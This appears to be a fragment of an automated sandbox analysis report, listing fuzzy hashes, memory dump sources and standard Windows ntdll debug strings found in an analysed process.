                                                                                                                                        • Instruction ID: f7ff211c854e4b615d809de8642c9cc0036305af72ea848336c62a17e5c1f431
                                                                                                                                        • Opcode Fuzzy Hash: 4a79bf933a9f00a0f78b974de8d52b3e5ea091ae8a212c4e6436ca354d7ecd4b
                                                                                                                                        • Instruction Fuzzy Hash: A451E4B5A04645AFCB34DEDCC8909BFBBF9AB4C200B048899E4D5DB681E7B4DA518760
                                                                                                                                        Strings
                                                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 03124787
                                                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03124742
                                                                                                                                        • Execute=1, xrefs: 03124713
                                                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03124725
                                                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 031246FC
                                                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03124655
                                                                                                                                        • ExecuteOptions, xrefs: 031246A0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                        • API String ID: 0-484625025
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __aulldvrm
                                                                                                                                        • String ID: +$-$0$0
                                                                                                                                        • API String ID: 1302938615-699404926
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                        • String ID: %%%u$[$]:%u
                                                                                                                                        • API String ID: 48624451-2819853543
                                                                                                                                        Strings
                                                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 031202BD
                                                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 031202E7
                                                                                                                                        • RTL: Re-Waiting, xrefs: 0312031E
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                        • API String ID: 0-2474120054
                                                                                                                                        Strings
                                                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03127B7F
                                                                                                                                        • RTL: Resource at %p, xrefs: 03127B8E
                                                                                                                                        • RTL: Re-Waiting, xrefs: 03127BAC
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                        • API String ID: 0-871070163
                                                                                                                                        APIs
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0312728C
                                                                                                                                        Strings
                                                                                                                                        • RTL: Resource at %p, xrefs: 031272A3
                                                                                                                                        • RTL: Re-Waiting, xrefs: 031272C1
                                                                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03127294
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                        • API String ID: 885266447-605551621
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                        • String ID: %%%u$]:%u
                                                                                                                                        • API String ID: 48624451-3050659472
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __aulldvrm
                                                                                                                                        • String ID: +$-
                                                                                                                                        • API String ID: 1302938615-2137968064
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: $$@
                                                                                                                                        • API String ID: 0-1194432280